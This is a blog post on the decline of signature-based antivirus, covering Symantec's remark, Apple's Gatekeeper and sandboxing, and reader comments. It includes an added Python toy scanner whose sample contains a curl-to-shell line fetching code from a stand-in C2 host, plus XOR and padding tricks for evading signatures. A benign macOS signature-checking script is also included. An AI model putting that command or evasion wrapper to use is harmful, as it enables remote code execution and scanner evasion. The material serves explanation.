Malware detection is a losing battle

As personal computing took off in the 1980s, people came to rely on security software to remove viruses, trojans, spyware, and other malicious software from their systems. For a couple of decades such software seemed a necessity, especially on platforms that suffered a larger onslaught of malware than others (namely Windows and the classic Mac OS, compared with OS X). Malware is still a major and ongoing problem; however, the classic approach of identifying and removing it after the fact looks more and more like a failed effort.

Recently Brian Dye, Symantec's senior vice president for information security, told the Wall Street Journal that antivirus "is dead" and is no longer being pursued as a moneymaker, suggesting that the classic approach of identifying malware variants one definition at a time is a losing battle overall.

The number of new malware samples that security companies see each year is growing exponentially (PDF), and with only a handful of such companies set against an ever-growing malware-writing community, there is little chance of keeping up with identifying each sample and shipping an effective definition for it. Recall, for example, the cat-and-mouse battle over the Flashback malware, where variants that circumvented new definitions sometimes appeared within days of the updates meant to catch them.
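To make that argument concrete, here is an added example (not code from the original post or from any vendor): a toy signature engine with a hash-based and a pattern-based definition, run over a constructed stand-in for a malicious file. It shows that a single appended byte sequence defeats the hash definition, that a trivial XOR wrapper defeats the pattern definition while the file still decodes to the same payload at run time, and that n trivial variants cost the defender n hash definitions. The sample bytes, the c2.invalid hostname and the STUB: framing are all constructed for the example.

```python
"""Toy signature engine showing why byte-exact definitions lose the race.

Added example, not code from the original post or from any vendor. The
"sample" below is a constructed stand-in for a malicious file, NOT real
malware, and the attacker moves are deliberately the simplest possible ones.
"""
import hashlib

# Constructed stand-in for a malicious payload: a fake header followed by a
# command string an analyst would want to flag (.invalid is a reserved TLD).
ORIGINAL_SAMPLE = b"\x7fELF" + b"curl -s http://c2.invalid/stage2 | sh\n" + b"\x00" * 16

# Definition 1, the kind the article describes: the exact SHA-256 of the file.
KNOWN_HASHES = {hashlib.sha256(ORIGINAL_SAMPLE).hexdigest()}

# Definition 2, a little smarter: byte patterns shared by the whole family.
PATTERNS = [b"c2.invalid/stage2", b"| sh\n"]


def matches_hash(sample: bytes, known_hashes=KNOWN_HASHES) -> bool:
    """Hash-based detection: flags only byte-identical copies."""
    return hashlib.sha256(sample).hexdigest() in known_hashes


def matches_pattern(sample: bytes, patterns=PATTERNS) -> bool:
    """Pattern-based detection: flags any sample containing a known substring."""
    return any(p in sample for p in patterns)


def pad_variant(sample: bytes, tag: int) -> bytes:
    """Attacker move 1: append four junk bytes. Behaviour is identical,
    but every distinct tag yields a file with a new hash."""
    return sample + tag.to_bytes(4, "big")


def count_unique_hashes(sample: bytes, n: int) -> int:
    """How many hash definitions a vendor must ship to cover n trivial variants."""
    return len({hashlib.sha256(pad_variant(sample, i)).hexdigest() for i in range(n)})


def xor_variant(sample: bytes, key: int) -> bytes:
    """Attacker move 2: store the body XOR-encoded behind a small stub so that
    no byte pattern from the original survives in the file on disk."""
    if not 0 < key < 256:
        raise ValueError("key must be a single non-zero byte")
    return b"STUB:" + bytes([key]) + bytes(b ^ key for b in sample)


def unpack_xor_variant(blob: bytes) -> bytes:
    """What the encoded variant does at run time: decode itself back into the
    original payload. A scanner that only looks at bytes on disk never sees this."""
    if not blob.startswith(b"STUB:"):
        raise ValueError("not an encoded variant")
    key = blob[5]
    return bytes(b ^ key for b in blob[6:])


def scan(sample: bytes) -> dict:
    """Run both definitions over a sample and report the verdicts."""
    return {"hash": matches_hash(sample), "pattern": matches_pattern(sample)}


if __name__ == "__main__":
    print("original       :", scan(ORIGINAL_SAMPLE))
    print("padded variant :", scan(pad_variant(ORIGINAL_SAMPLE, 1)))
    print("encoded variant:", scan(xor_variant(ORIGINAL_SAMPLE, 0x5A)))
    print("definitions needed for 1000 padded variants:",
          count_unique_hashes(ORIGINAL_SAMPLE, 1000))
```

The pattern definition survives the padding trick, which is why real scanners moved from hashes to patterns and heuristics long ago; but the XOR wrapper shows the next step in the same race, and each step costs the defender far more analysis time than it costs the attacker.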

Furthermore, attackers are finding ways to compromise systems that forgo the need for classic malware altogether, sometimes by capitalizing on industry mistakes, as was the case with the recently found but long-standing Heartbleed bug in OpenSSL. Because such an attack exploits a flaw in software that is already installed and trusted, there is no malicious file on the target for a definition to match.

What this means is that the cybersecurity landscape is changing to the point where, more than ever, you cannot rely on a security suite to keep your system safe. Once a vulnerability is found, code that exploits it often spreads through malware circles faster than the developer can issue a fix.

There will always be some benefit in tracking down threats and deleting them, but keeping that effort effective will always be daunting. To an extent this has always been the case: security tools are only aids for discovering malware and preventing it from being installed, and they are not always successful or correct.

If you look at Apple's approach to this matter, the company has put active malware detection on the back burner. Rather than focusing its efforts on its XProtect malware-detection system, Apple has favored containment: not of the malware itself, but of the possibilities for exploitation and for access to user data.

Every program Apple hosts on its Mac App Store is required to be sandboxed and digitally signed, and with Gatekeeper enabled at its default setting only applications signed by the App Store or by a registered developer will launch. For personal data, Apple is focusing on encryption and on passwords stored in keychains, offering easy generation of high-quality passwords for authenticating to Web sites and managing them in the user's keychain.
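Checking those properties on a given bundle yourself, as an added example that is not part of the original post or of Apple's documentation: the script below asks the stock codesign and spctl tools whether a bundle's signature is intact, who signed it, whether it carries the App Sandbox entitlement, and whether Gatekeeper would let it launch under the current policy. It only works on a Mac; the function name, the bundle-path argument and the return-code scheme are my own choices.

```shell
#!/bin/sh
# Added example, not from the original post or from Apple: ask the stock
# macOS tools what they know about an application bundle. Assumes macOS
# with codesign(1) and spctl(8) present; the bundle path is an argument.
# Return codes: 0 signed and accepted by Gatekeeper; 1 bad argument;
# 2 tools missing (not macOS); 3 signature invalid or absent;
# 4 Gatekeeper rejects the bundle under the current policy.
gatekeeper_report() {
    app="$1"
    if [ -z "$app" ] || [ ! -e "$app" ]; then
        echo "usage: gatekeeper_report /path/to/App.app (path must exist)" >&2
        return 1
    fi
    if ! command -v codesign >/dev/null 2>&1 || ! command -v spctl >/dev/null 2>&1; then
        echo "codesign/spctl not found; this check only works on macOS" >&2
        return 2
    fi

    # Is Gatekeeper (security assessment) switched on at all?
    echo "gatekeeper: $(spctl --status 2>&1)"

    # Is the signature intact, and does every file in the bundle still match it?
    if ! codesign --verify --deep --strict "$app" 2>/dev/null; then
        echo "signature: invalid or missing for $app"
        return 3
    fi

    # Who signed it? codesign writes these details to stderr.
    codesign -d --verbose=2 "$app" 2>&1 \
        | grep -E '^(Identifier|TeamIdentifier|Authority)=' \
        | sed 's/^/signature: /'

    # Did the developer opt into the App Sandbox? The entitlements plist is
    # printed to stdout; the ":-" form is the long-documented syntax (recent
    # macOS releases warn that it is deprecated but still honour it).
    if codesign -d --entitlements :- "$app" 2>/dev/null \
            | grep -q 'com.apple.security.app-sandbox'; then
        echo "sandbox: app-sandbox entitlement present"
    else
        echo "sandbox: no app-sandbox entitlement"
    fi

    # Would Gatekeeper let it launch under the current policy? spctl reports
    # the verdict and the source (Mac App Store, Developer ID, ...) on stderr.
    verdict=$(spctl --assess --type execute --verbose "$app" 2>&1)
    status=$?
    echo "$verdict" | sed 's/^/gatekeeper: /'
    [ "$status" -eq 0 ] || return 4
    return 0
}

# Usage on a Mac: gatekeeper_report /Applications/Safari.app
```

A bundle that passes codesign --verify but is rejected by spctl is the common case for software downloaded outside the App Store and signed with a certificate Gatekeeper does not trust; a bundle that passes both but lacks the app-sandbox entitlement is signed and allowed to run, yet has no containment once it does.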

By using these options Apple provides with your Mac, you can stay ahead of the curve in terms of security. Some services, such as iCloud Keychain, offer convenience more than additional security, but they are optional. As efforts like these shift toward blocking malware from within rather than eradicating it, there are several things you can do to keep up with the trend: not only ensuring your data stays safe even if malware does end up on your system, but also avoiding malware altogether.

These basically revolve around giving up reliance on a security software package to keep you safe and instead layering your security, starting with how you manage passwords, then how you package sensitive files, and finally how you configure your system for use. Anti-malware tools can still help with this effort, but they should no longer be relied upon as the sole source of your computer's security.

3 thoughts on “Malware detection is a losing battle”

  1. thewiteddog11

    I think what Brian Dye is really saying is that there is no longer enough money in the security software business to cover the costs of keeping up with the pace of change in security threats. This could be due to the competition Symantec faces in their market niche at least as much as to the nature of the security threats themselves. So far, at least, none of his competitors have shown similar signs of giving up the fight. Indeed, if Symantec falls, that will leave more room for the competition and, theoretically, more money to be made by them in the security business as they vie for Symantec’s market share. Symantec has a track record of giving up when the going gets difficult, as they did more than a decade ago when they dropped development of Norton Disk Doctor at the advent of OS X, leaving the field clear for Micromat, Alsoft and Prosoft, authors of TechTool Pro, DiskWarrior and Drive Genius respectively.

    It’s certainly the case that the nature of malware is changing rapidly. However, the notion that users can keep up with this changing landscape when professional security experts like those presumably working at Symantec cannot strains credulity. It’s also hard to understand how Apple can give up on their own efforts to meet ongoing threats with their XProtect technology – just when we thought Apple was finally taking their customers’ security seriously.

    No doubt a multi-layered approach to security is advisable. How you expect average users to understand, let alone implement, such a strategy is beyond me – as I expect it is beyond them.

  2. Jay

    Symantec has been garbage as long as I can remember and definitely as long as I’ve been actively testing them, and their bad reputation in Mac circles is completely justified. I do have to say their latest suite (version 12 and up) runs remarkably smoothly on OS X with little to no system impact or resource hogging. However, after years of bad software their reputation is hard, if not impossible, to shake. Their firewall software is decent; their AV for Mac is simply no good, even if it was free.

    If they give up the AV as we know it today, it won’t be a loss to Mac users.

  3. Derek Currie

    [Restraining my comments…] I have to point out that Symantec has consistently had a grudge against Macs. They single-handedly instigated the rubbish ‘security through obscurity’ myth about OS X in 2005 solely as a FUD scare tactic to sell more Norton’s Anti-Virus. I can’t forgive them for such behavior. IMHO, what we’re hearing from Brian Dye is a Symantec death throe after particularly poor recent profits. From the perspective of a Mac user, I’d be extremely pleased to see Symantec remove their worst-in-class anti-malware from the Mac market. I’d instead champion just about any alternatives (apart from, of course, awful MacKeeper and the ruin that was made of iAntiVirus). ClamXav is a great free app for everyone, protecting against most malware for both Mac and Windows.
